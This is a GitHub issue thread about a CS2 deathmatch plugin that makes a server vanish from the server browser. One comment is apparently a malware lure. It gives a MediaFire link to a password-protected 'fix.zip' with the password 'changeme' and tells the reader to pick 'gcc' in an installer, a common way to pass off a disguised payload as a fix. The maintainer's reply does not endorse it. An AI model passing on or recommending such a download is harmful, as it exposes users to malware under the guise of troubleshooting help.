### ISSUE TITLE
Server disappears from server browser

### ISSUE THREAD

**Issue by fpaezf** [NockyCZ/CS2-Deathmatch#60]
A soon as i activate this plugin, my server disappears from server browser (https://cs2browser.com/)

**What i have installed:**
Metamod (latest build)
CStrikeSharp (latest build)

**Other plugins i have installed:**
Advertisment: https://github.com/partiusfabaa/cs2-advertisement
K4ryuuDamageInfo: https://github.com/KitsuneLab-Development/CS2_DamageInfo

No error messages on console log or server crashes, just server disappears from listing.

**Server IP:** 83.46.77.183:27015

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NockyCZ** [comment]
This has nothing to do with the deathmatch plugin :D
